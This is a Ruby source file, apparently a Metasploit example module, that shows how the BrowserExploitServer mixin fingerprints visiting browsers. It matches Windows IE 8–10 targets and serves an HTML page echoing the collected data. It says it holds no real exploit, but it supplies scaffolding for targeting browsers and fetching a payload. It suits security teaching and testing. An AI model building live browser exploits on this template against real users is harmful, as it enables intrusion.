##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

#
# Proof-of-concept module demonstrating the BrowserExploitServer mixin.
# It does not carry a real exploit: the HTML it serves is a plain page that
# echoes the fingerprint the mixin collected for the visiting client.
#
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # Supplies the detection phase, target matching, get_target/get_payload and
  # send_exploit_html used below (none of those helpers are defined in this file).
  include Msf::Exploit::Remote::BrowserExploitServer

  #
  # Registers module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  #
  def initialize(info={})
    super(update_info(info,
      'Name'           => "IE Exploit for BrowserExploitServer Proof-of-Concept",
      'Description'    => %q{
        Here's an example of building an exploit using the BrowserExploitServer.
        This example requires the target to be exploit. If not, the mixin will
        send a fake 404 as a way to avoid engaging the target. The example is
        for Windows only.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     =>
        [
          [ 'URL', 'https://metasploit.com' ]
        ],
      'Platform'       => 'win',
      # Conditions a client must satisfy before on_request_exploit is reached.
      # :source accepts either a script-based or a headers-only fingerprint;
      # :os_name restricts delivery to Windows clients.
      'BrowserRequirements' =>
        {
          :source => /script|headers/i,
          #:clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
          #:method => "LoadMovie",
          :os_name => /win/i
        },
      # Target 0 ('Automatic', empty hash) is the DefaultTarget below; the named
      # entries pair an os_flavor/ua_name/ua_ver match with example per-target
      # options ('Rop', 'Offset') that this PoC never reads.
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [
            'Windows XP with IE 8',
            {
              'os_flavor' => 'XP',
              'ua_name'   => 'MSIE',
              'ua_ver'    => '8.0',
              'Rop'       => true,
              'Offset'    => 0x100
            }
          ],
          [
            'Windows 7 with IE 9',
            {
              'os_flavor' => '7',
              'ua_name'   => 'MSIE',
              'ua_ver'    => '9.0',
              'Rop'       => true,
              'Offset'    => 0x100
            }
          ],
          [
            'Windows 7 with IE 10',
            {
              'os_flavor' => '7',
              'ua_name'   => 'MSIE',
              'ua_ver'    => '10.0',
              'Rop'       => true,
              'Offset'    => 0x100
            }
          ]
        ],

      'Payload'        =>
        {
          'BadChars'        => "\x00",  #Our spray doesn't like null bytes
          'StackAdjustment' => -3500
        },
      'Privileged'     => false,
      'DisclosureDate' => "Apr 1 2013",
      'DefaultTarget'  => 0))
  end

  #
  # This example shows how to use ERB and being able to use the arguments and local vars
  #
  # Two evaluation stages are mixed in the template: the #{...} interpolations
  # are resolved here, when the %Q string is built, while the <% %> / <%= %>
  # tags are left for ERB to evaluate later against the returned binding.
  # That binding must therefore still contain +target_info+, +txt+ and +txt2+,
  # so these local names are part of the template's contract.
  #
  # @param target_info [Hash] fingerprint collected by the mixin (see the
  #   raw example at the bottom of the file for the keys observed)
  # @param txt [String] extra text rendered through <%=txt%>
  # @return [Array(String, Binding)] the ERB source and the binding to render it with
  #
  def exploit_template1(target_info, txt)
    txt2 = "I can use local vars!"

    # NOTE(review): neither the ERB output tags nor the interpolated target_info
    # values are HTML-escaped. For this PoC the inputs are a fixed string and
    # the client's own reported fingerprint; anything else fed in here should
    # go through an escaper first.
    template = %Q|
    <% msg = "This page is generated by an exploit" %>
    <%=msg%><br>
    <%=txt%><br>
    <%=txt2%><br>
    <p></p>
    Data gathered from source: #{target_info[:source]}<br>
    OS name: #{target_info[:os_name]}<br>
    Flavor: #{target_info[:os_flavor]}<br>
    UA name: #{target_info[:ua_name]}<br>
    UA version: #{target_info[:ua_ver]}<br>
    Java version: #{target_info[:java]}<br>
    Office version: #{target_info[:office]}<br>
    Silverlight enabled: #{target_info[:silverlight]}
    |

    # Returning the binding (not just the string) is what lets ERB see txt/txt2.
    return template, binding()
  end

  #
  # This example shows how to generate an ERB template without passing binding
  #
  # Same two-stage layout as exploit_template1, but the ERB tags only reference
  # +msg+, which the template defines itself, so no binding is needed.
  #
  # @param target_info [Hash] fingerprint collected by the mixin
  # @return [String] the ERB source
  #
  def exploit_template2(target_info)
    %Q|
    <% msg = "This page is generated by an exploit" %>
    <%=msg%><br>
    <p></p>
    Data gathered from source: #{target_info[:source]}<br>
    OS name: #{target_info[:os_name]}<br>
    Flavor: #{target_info[:os_flavor]}<br>
    UA name: #{target_info[:ua_name]}<br>
    UA version: #{target_info[:ua_ver]}<br>
    Java version: #{target_info[:java]}<br>
    Office version: #{target_info[:office]}<br>
    Silverlight enabled: #{target_info[:silverlight]}
    |
  end

  #
  # Called by the mixin once a client has passed the BrowserRequirements.
  # Logs the selected target, dumps a few values for illustration, then serves
  # one of the two example templates.
  #
  # @param cli [Object] the client connection handed over by the mixin
  # @param request [Object] the HTTP request (unused here)
  # @param target_info [Hash] fingerprint collected by the mixin
  #
  def on_request_exploit(cli, request, target_info)
    vprint_status("Target selected: #{get_target.name}")
    # rop_junk / rop_nop are resolved from the included mixins, not this file;
    # each is packed as a 32-bit little-endian value and hex-dumped purely for demonstration.
    print_line(Rex::Text.to_hex_dump([rop_junk].pack("V*")))
    print_line(Rex::Text.to_hex_dump([rop_nop].pack("V*")))
    p = get_payload(cli, target_info)
    # Payload bytes are only shown in verbose mode.
    vprint_line(Rex::Text.to_hex_dump(p))
    print_status("Sending exploit HTML...")

    # Randomly pick a template to test
    # send_exploit_html receives either [template, binding] or a bare template
    # string, so both return shapes of the helpers above are accepted.
    if [true, false].sample
      txt = "I can pass more args"
      send_exploit_html(cli, exploit_template1(target_info, txt))
    else
      send_exploit_html(cli, exploit_template2(target_info))
    end
  end

  #
  # Entry point; delegates entirely to the mixin, which starts the server.
  # The override is kept only as a visible hook for module-specific setup.
  #
  def exploit
    super
  end

end

=begin
Example of raw target_info:
{:source=>"script", :os_name=>"Microsoft Windows", :os_flavor=>"XP", :ua_name=>"MSIE", :ua_ver=>"8.0", :arch=>"x86", :office=>"null", :proxy=>false, :language=>"en-us", :tried=>true}
=end
